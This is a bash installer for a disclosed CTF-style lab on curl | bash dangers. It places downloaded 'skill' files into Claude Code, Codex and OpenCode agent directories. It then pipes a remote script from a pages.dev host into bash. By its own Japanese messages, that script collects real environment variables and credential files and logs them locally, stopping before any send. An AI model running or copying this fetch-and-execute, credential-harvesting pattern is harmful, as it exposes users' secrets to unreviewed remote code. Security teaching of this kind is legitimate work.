#!/usr/bin/env bash
# Dedicated, disclosed lab installer. Installing through this entry point
# immediately starts the credential-collection demo using curl | bash.
# Merely copying SKILL.md does NOT execute anything.
set -euo pipefail

base_url="https://curl-bash-ctf.pages.dev"
agent="all"
out=""

die() { echo "install.sh: $*" >&2; exit 1; }

while [ "$#" -gt 0 ]; do
  case "$1" in
    --base-url|--agent|--out)
      [ "$#" -ge 2 ] && [ -n "$2" ] || die "$1 requires a value"
      case "$1" in
        --base-url) base_url="${2%/}" ;;
        --agent) agent="$2" ;;
        --out) out="$2" ;;
      esac
      shift 2
      ;;
    -h|--help)
      cat <<'EOF'
Usage: install.sh [--agent all|claude|codex|opencode] [--out DIR]
                  [--base-url URL]

デモ用：スキル配置後、curl | bash で実際の認証情報の収集が始まります。
収集データはファイルとログに残ります。攻撃者への送信直前で停止します。
既存のスキルは上書きしません。再実行には別の --out DIR を指定できます。

Default: install for Claude Code and Codex; OpenCode discovers these too.
--base-url is the directory URL containing SKILL.md, references/ and scripts/.
EOF
      exit 0
      ;;
    *) die "unknown argument: $1" ;;
  esac
done

case "$base_url" in
  https://*|http://*) ;;
  *) die "--base-url must be an HTTP(S) URL" ;;
esac
case "$agent" in
  all|claude|codex|opencode) ;;
  *) die "--agent must be all, claude, codex or opencode" ;;
esac

for required in curl bash python3 tee; do
  command -v "$required" >/dev/null 2>&1 || die "$required is required"
done

targets=()
if [ -n "$out" ]; then
  targets+=("$out")
else
  case "$agent" in
    all)
      targets+=("$HOME/.claude/skills/curl-bash-ctf")
      targets+=("$HOME/.agents/skills/curl-bash-ctf")
      ;;
    claude) targets+=("$HOME/.claude/skills/curl-bash-ctf") ;;
    codex) targets+=("$HOME/.agents/skills/curl-bash-ctf") ;;
    opencode) targets+=("${XDG_CONFIG_HOME:-$HOME/.config}/opencode/skills/curl-bash-ctf") ;;
  esac
fi
for target in "${targets[@]}"; do
  if [ -e "$target" ] || [ -L "$target" ]; then
    die "already exists: $target (not overwritten; use a different --out DIR)"
  fi
done

echo "[demo] 情報漏洩を追体験する教材をインストールします。"
echo "[demo] インストール後すぐに、実際の環境変数・認証設定ファイルを収集します。"
echo "[demo] 生データはローカルのファイルとログに残ります。攻撃者への送信直前で停止します。"

# Keep the downloaded bundle and transcript together for the debrief.
# No shell settings, agent hooks or startup configuration are modified.
log_dir="$(mktemp -d "${TMPDIR:-/tmp}/curl-bash-ctf-install-XXXXXX")"
bundle="$log_dir/skill"
mkdir -p "$bundle/scripts" "$bundle/references"
files=(
  SKILL.md
  README.md
  references/secret-patterns.json
  references/agent-log-formats.md
  scripts/run.sh
  scripts/scan-secrets.js
  scripts/challenge-template.sh
)
curl_args=(--fail --silent --show-error --location --connect-timeout 10 --max-time 60)
for file in "${files[@]}"; do
  curl "${curl_args[@]}" --output "$bundle/$file" "$base_url/$file"
done
for target in "${targets[@]}"; do
  mkdir -p "$(dirname "$target")"
  cp -R "$bundle" "$target"
  echo "[install] skill: $target"
done

echo "[install] スキルの配置が完了しました。続けて curl | bash でデモを開始します。"
echo "[install] ダウンロード先: $base_url/scripts/challenge-template.sh"
echo "[install] デモのログ: $log_dir/trace.log"
printf '[install] ログ監査: node %q %q --format text --out %q\n' \
  "$bundle/scripts/scan-secrets.js" "$log_dir/trace.log" "$log_dir/findings.json"

# Downloads the challenge; it does NOT upload collected data. The challenge
# unconditionally stops before sending its prepared HTTP request.
# pipefail reports either a failed download, script failure or log failure.
curl "${curl_args[@]}" "$base_url/scripts/challenge-template.sh" \
  | bash \
  | tee "$log_dir/trace.log"
